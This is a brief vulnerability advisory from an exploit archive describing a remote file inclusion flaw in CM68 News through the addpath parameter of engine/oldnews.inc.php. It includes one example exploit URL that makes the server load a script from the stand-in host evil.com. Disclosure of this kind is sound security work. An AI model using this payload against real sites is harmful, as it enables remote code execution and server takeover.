id: 1239
date: 12/08/2006
title: CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
author: Paul Bakoyiannis
cves: 

==================================================================
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
==================================================================




Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&




#  0day.today [2023-03-26]  #